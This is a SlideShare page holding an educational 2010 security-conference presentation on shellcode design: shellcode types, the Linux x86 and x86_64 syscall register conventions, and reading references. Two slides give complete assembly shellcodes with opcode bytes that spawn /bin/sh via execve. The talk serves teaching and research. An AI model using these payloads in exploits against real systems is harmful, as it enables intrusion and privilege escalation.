Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Design and Implementation of Shellcodes.

How shellcodes are working and how they are created.

Ähnliche Bücher

Kostenlos mit einer 30-tägigen Testversion von Scribd

Alle anzeigen

Ähnliche Hörbücher

Kostenlos mit einer 30-tägigen Testversion von Scribd

Alle anzeigen
  • Als Erste(r) kommentieren

Design and Implementation of Shellcodes.

  1. 1. Design and Implementation of Shellcodes Amr Ali Cairo Security Camp 2010
  2. 2. What is a shellcode? • It's bytecode • Machine language • Compiled Assembly source file • A string of mostly unprintable characters • Opcodes that the processor executes directly • Mostly doesn't contain NULL bytes • It is position independent
  3. 3. Types of Shellcodes • Local shellcode • Remote shellcode • Download and execute shellcode • Egg-hunt shellcode • Omelet shellcode
  4. 4. Local shellcode System + Normal User Privs Shellcode Vulnerable Root Process System + Root Privs
  5. 5. Remote shellcode Network Shellcode Vulnerable Remote Service System + Root Privs
  6. 6. Download and execute shellcode Any Medium Shellcode Vulnerable Anything Payload on the Internet System Downloads Runs Payload
  7. 7. Egg-hunt shellcode Vulnerable Process Egg-hunt Shellcode Shellcode Unpredictable location
  8. 8. Omelet .....?
  9. 9. Omelet shellcode Egg-hunt Shellcode Shellcode Chunk Vulnerable Process Shellcode Chunk Shellcode ChunkShellcode Chunk
  10. 10. x86 and Linux kernel ABI EAX : Holds the system call number. EBX : Contains the value or address of the 1st argument to the system call. ECX : Contains the value or address of the 2nd argument to the system call. EDX : Contains the value or address of the 3rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register.
  11. 11. x86_64 and Linux kernel ABI RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3rd argument for the system call. RDI : The 1st argument for the system call. RSI : The 2nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4th argument for the system call. R9 : The 5th argument for the system call. R10 : The 6th argument for the system call. R11 – R15 : General purpose registers.
  12. 12. x86 shellcode .global _start _start: cltd # 0x99 push %edx # 0x52 push $0x68732f2f # 0x68 0x2f 0x2f 0x73 0x68 push $0x6e69622f # 0x68 0x2f 0x62 0x69 0x6e movl %esp, %ebx # 0x89 0xe3 push %edx # 0x52 push %ebx # 0x53 push %esp # 0x54 pop %edx # 0x5a movb $0x0b, %al # 0xb0 0x0b int $0x80 # 0xcd 0x80
  13. 13. x86_64 shellcode .global _start _start: cltd # 0x99 push %rdx # 0x52 movq $0x68732f6e69622f2f, %rbx # 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 push %rbx # 0x53 movq %rsp, %rdi # 0x48 0x89 0xe7 push %rdx # 0x52 push %rdi # 0x57 movq %rsp, %rsi # 0x48 0x89 0xe6 push $0x3b # 0x6a 0x3b pop %rax # 0x58 syscall # 0x0f 0x05
  14. 14. Information • Smashing the stack for fun and profit by Aleph1 http://www.phrack.org/issues.html?issue=49&id=14 • Shellcode: the assembly cocktail by Samy Bahra http://www.infosecwriters.com/hhworld/shellcode.txt • The Shellcoder's Handbook
  15. 15. Thanks Questions? All presented material today will be available on my website. http://amr-ali.co.cc

    Als Erste(r) kommentieren

    Loggen Sie sich ein, um Kommentare anzuzeigen.

  • 0xXXX

    Jul. 9, 2014
  • StephinPhilip

    Oct. 2, 2015

How shellcodes are working and how they are created.

Aufrufe

Aufrufe insgesamt

545

Auf Slideshare

0

Aus Einbettungen

0

Anzahl der Einbettungen

38

Befehle

Downloads

16

Geteilt

0

Kommentare

0

Likes

2

×